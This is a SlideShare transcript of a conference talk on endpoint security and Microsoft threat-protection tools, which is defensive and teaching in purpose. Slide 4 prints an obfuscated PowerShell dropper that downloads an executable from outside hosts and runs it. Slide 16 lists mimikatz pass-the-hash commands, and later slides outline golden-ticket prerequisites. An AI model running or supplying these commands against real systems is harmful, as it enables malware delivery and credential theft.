Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

ExpertsLiveEurope The New Era Of Endpoint Security

102 views

Published on

Cyber Security & Defense is the emerging topic of the IT industry these days. A secure environment is no longer just a well-maintained firewall or a well-managed network. Rather, it is made up of several layers. However, most companies are „reactive“ instead of „proactive“, or neither, when it comes to securing their IT environments and detecting security breaches. In addition to this, the product portfolio and the security market is changing rapidly, and these changes make our jobs as IT Professionals significantly more difficult. But how can we deal with this challenge? In my session I will take a look into supposed “obvious“ security threats and how the Microsoft Cyber security stack can help to detect attackers and threats that have evaded our defenses.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

ExpertsLiveEurope The New Era Of Endpoint Security

  1. 1. The new era of endpoint security Alexander Benoit Microsoft MVP Enterprise Security | Certified Ethical Hacker @ITPirate
  2. 2. Alex Benoit Lead Security Analyst Modern Secure Workplace Microsoft Threat Protection Alexander.Benoit@sepago.de @ITPirate | @TrustInTechCGN | @GeekZeugs https://it-pirate.com/
  3. 3. Microsoft Threat Protection
  4. 4. Obfuscation ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`t}.” `I`N`V`o`k`e`C`o`m`m`A`N`D”).” `N`e`w`S`c`R`i`p`T`B`l`o`c`k”((&(`G`C`M *w=O*)” `N`e`t`. `W`e`B`C`l`i`e`N`T”).” `D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘ht’+’tps://bit.ly/XYZ’))) $nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = ' http://aposdiqwpoe.com/BUR/testv.php?l=ando6.yarn'.Split('@');$SDC = $env:public + '' + $NSB + ('.ex'+'e');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e- Item')($SDC);break;}catch{}
  5. 5. protect your data Sandboxing and detonation • anonymous links • companywide sharing • explicit sharing • guest user activity collaboration signals • malware in email + SPO • Windows Defender • Windows Defender ATP • suspicious logins • risky IP addresses • irregular file activity threat feeds • users • IPs • On-demand patterns (e.g. WannaCry) activity watch lists Leverage Signals Apply Smart Heuristics Files in SPO, ODB and Teams 1st and 3rd party reputation Multiple AV engines SharePoint OneDrive Microsoft Teams
  6. 6. protect your data
  7. 7. ****** Require MFA Allow access Deny access Force password reset Limit access Controls Users Devices Location Apps Conditions Machine learning Policies Real time Evaluation Engine 3 10TB Effective policy Session Risk conditional access
  8. 8. conditional access
  9. 9. conditional access
  10. 10. conditional access
  11. 11. conditional access
  12. 12. conditional access
  13. 13. conditional access
  14. 14. conditional access
  15. 15. conditional access
  16. 16. pass-the-hash 1. mimikatz 2. privilege::debug 3. sekurlsa::logonpasswords 4. sekurlsa::pth /user:Captain /ntlm:6f0bafeef436381c8d38d106c767f6c8 /domain:itpirate.local
  17. 17. pass-the-ticket 1. krbtgt user’s NTLM hash (e.g. from a previous NTDS.DIT dump) 2. Domain name 3. Domain’s SID 4. Username that we’d like to impersonate
  18. 18. pass-the-ticket 1. krbtgt user’s NTLM hash 2. Domain name 3. Domain’s SID 4. Username that we’d like to impersonate
  19. 19. pass-the-ticket 1. krbtgt user’s NTLM hash 2. Domain name 3. Domain’s SID 4. Username that we’d like to impersonate
  20. 20. pass-the-ticket
  21. 21. pass-the-ticket
  22. 22. pass-the-ticket
  23. 23. pass-the-ticket
  24. 24. protect your admin identity
  25. 25. protection against identity theft Abnormalresourceaccess Account enumeration Net Sessionenumeration DNS enumeration SAM-R Enumeration Abnormalworking hours Brute force using NTLM, Kerberos, or LDAP Sensitiveaccountsexposed in plain text authentication Serviceaccountsexposed in plaintext authentication Honey Tokenaccountsuspicious activities Unusualprotocol implementation MaliciousDataProtectionPrivateInformation (DPAPI) Request AbnormalVPN Abnormalauthenticationrequests Abnormalresourceaccess Pass-the-Ticket Pass-the-Hash Overpass-the-Hash Maliciousservicecreation MS14-068exploit (Forged PAC) MS11-013exploit (Silver PAC) Skeletonkey malware Goldenticket Remoteexecution Maliciousreplicationrequests AbnormalModificationof SensitiveGroups Reconnaissance ! ! ! Compromised Credential Lateral Movement Privilege Escalation Domain Dominance
  26. 26. protection against cloud threats Malicious Insider Protect against disgruntled employees before they cause damage Ransomware Identify ransomware using sophisticated behavioral analytics technology Rogue Application Identify rouge applications that access your data Compromised Accounts Combat advanced attackers that leverage compromise user credentials Malware Detect malware in cloud storage as soon as it’s uploaded Data exfiltration Detect unusual flow of data outside of your organization
  27. 27. detection across cloud apps Unusualfile shareactivity Unusualfile download Unusualfile deletionactivity Ransomwareactivity Data exfiltrationto unsanctionedapps Activityby a terminatedemployee Indicators of a compromised session Malicious use of an end-user account Threat delivery and persistence ! ! ! Malicious use of a privileged user Activityfrom suspicious IP addresses Activityfrom anonymousIP addresses Activityfrom an infrequentcountry Impossible travelbetweensessions Logon attempt from a suspicious user agent Malwareimplantedin cloud apps MaliciousOAuthapplication Multiplefailed login attempts to app Suspicious inbox rules (delete,forward) Unusualimpersonatedactivity Unusualadministrativeactivity Unusualmultiple deleteVM activity
  28. 28. malware detection • Scan cloud storage apps • Identify potentially risky files
  29. 29. Thank You! Gold Silver Conference Partner

×